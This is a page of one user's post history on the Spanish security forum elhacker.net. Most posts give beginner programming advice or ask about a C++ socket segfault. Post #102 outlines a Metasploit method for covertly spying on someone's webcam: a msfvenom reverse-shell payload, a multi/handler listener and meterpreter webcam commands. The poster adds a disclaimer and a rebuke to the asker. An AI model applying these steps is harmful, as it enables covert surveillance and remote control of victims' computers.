elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23
101  Foros Generales / Dudas Generales / Re: Presentación en: 27 Julio 2018, 15:03 pm
¡Por fín!  :D
¡Alguien que no busca hackear webcams, facebook o whatsapp!
Te recomiendo empezar con C, después python y despúes javascript, y como más o menos es lo que decías vas bien.
En lo de base de datos, yo lo dejaría para después de aprender programación, etc.
Suerte,  :D
fox459
102  Seguridad Informática / Hacking / Re: Porfi necesito ayuda :3 en: 27 Julio 2018, 14:56 pm
"Hacking a cambio de nada", si se pudiese espiar así como así las webcam, no habría nadie que la tuviese descubierta, pero te digo una manera de espíar cualquier webcam:
--------------------------------------------------------------------------------------------------------------------------
Método 1:
Necesario:
*Metasploit Framework
*Linux

Primero:
    -Crea un payload con msfvenom, de la siguiente manera:
    -msfvenom -p <aquí el módulo dependiendo del OS> LHOST = <tu ip> LPORT <el puerto a escuchar>
    R > <archivo.extensión>
Después:
    -El sistema remoto debe ejecutar el payload, antes de ello entra en metasploit framework console.
    -Antes de que lo ejecute, usa el módulo exploit/multi/handler, pon el payload, configura la ip y el puerto         untilizados en el payload, y escribe exploit, después dale al Enter.
Por último:
    -Una vez en el meterpreter, escribe webcam_list, y selecciona la webcam que quieras utilizar, y              -   escribe webcam_snap para guardar una imagen, o webcam_stream para verlo en directo.
Por cierto, esto es viejo, lo detectaran todos los AV y suele fallar.
--------------------------------------------------------------------------------------------------------------------------  Método 2:
    -Resignate, y date cuenta de que por usar un programa, que puede ser perfectamente un troyano   bien hermoso.
    -¡¿¡¿Das por hecho que aquí usamos programas para espíar webcams?!?!
    -Esto es un foro de hacking ético, no preguntes que programa usar para "hackear webcams"
--------------------------------------------------------------------------------------------------------------------------
Pues eso ha sido todo,
PD: Cammy es un personaje del street fighter.
103  Programación / Programación General / Re: Saludos en: 24 Julio 2018, 20:11 pm
Hola y bienvenido,
Te recomiendo empezar con C, y a partir de ahí, y ya sabiendo las bases de la porgramación estructurada, python y javascript, html simplemente es la base de una web, y javascript, lo que la hace interactiva y funcional.
C -> Programas, apps, etc...
Python -> Scripting, programas, etc....
fox459
104  Programación / Programación C/C++ / Re: Violación de segmento en sockets en: 17 Julio 2018, 20:50 pm
Gracias, al parecer era más complejo de lo que me esperaba,
no he hecho nada bien, vamos,
supongo que me leere c++ debugging,
Gracias,
fox459 (apenado por sus limitados concimientos)
105  Programación / Programación C/C++ / Re: Violación de segmento en sockets en: 17 Julio 2018, 17:02 pm
Mi programa aún está sumido en el caos, sin perfeccionar, etc.
Pero gracias,  :-*
fox459
106  Programación / Programación C/C++ / Re: Violación de segmento en sockets en: 17 Julio 2018, 10:31 am
Gracias por las respuestas,
pero he hecho la prueba de ponerlo fuera de cualquier función y no me da Violación de segmento :huh:.
Gracias,
fox459
107  Programación / Programación C/C++ / Re: Violación de segmento en sockets en: 16 Julio 2018, 17:40 pm
Seguramente, ese código me ha ido, el código completo está en https://github.com/wallyandwaldo/bar/blob/master/bar.cpp
Gracias,  :-*
fox459
108  Programación / Programación C/C++ / Re: Violación de segmento en sockets en: 16 Julio 2018, 13:13 pm
No,  :-\
Solo tengo dos líneas para lo de los sockets.
int packet_socket;
packet_socket = socket(AF_INET, SOCK_STREAM, 0);
Gracias,   :-*
fox459
109  Foros Generales / Foro Libre / Re: 8 de cada 10 adultos españoles adictos al móvil en: 16 Julio 2018, 10:51 am
Qué es verdad.
Vamos a acabar muy mal si seguimos así.
110  Programación / Programación C/C++ / Violación de segmento en sockets en: 16 Julio 2018, 10:39 am
Hola,  :D
He ido a iniciar un pequeño socket en C++, me ha dado un mensaje de error en el que decía:
Citar
Violación de segmento
.
La línea en la que me da el error pone lo siguiente:
Citar
packet_socket = socket(AF_INET, SOCK_STREAM, 0);
Gracias,  :D
fox459
Páginas: 1 2 3 4 5 6 7 8 9 10 [11] 12 13 14 15 16 17 18 19 20 21 22 23
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines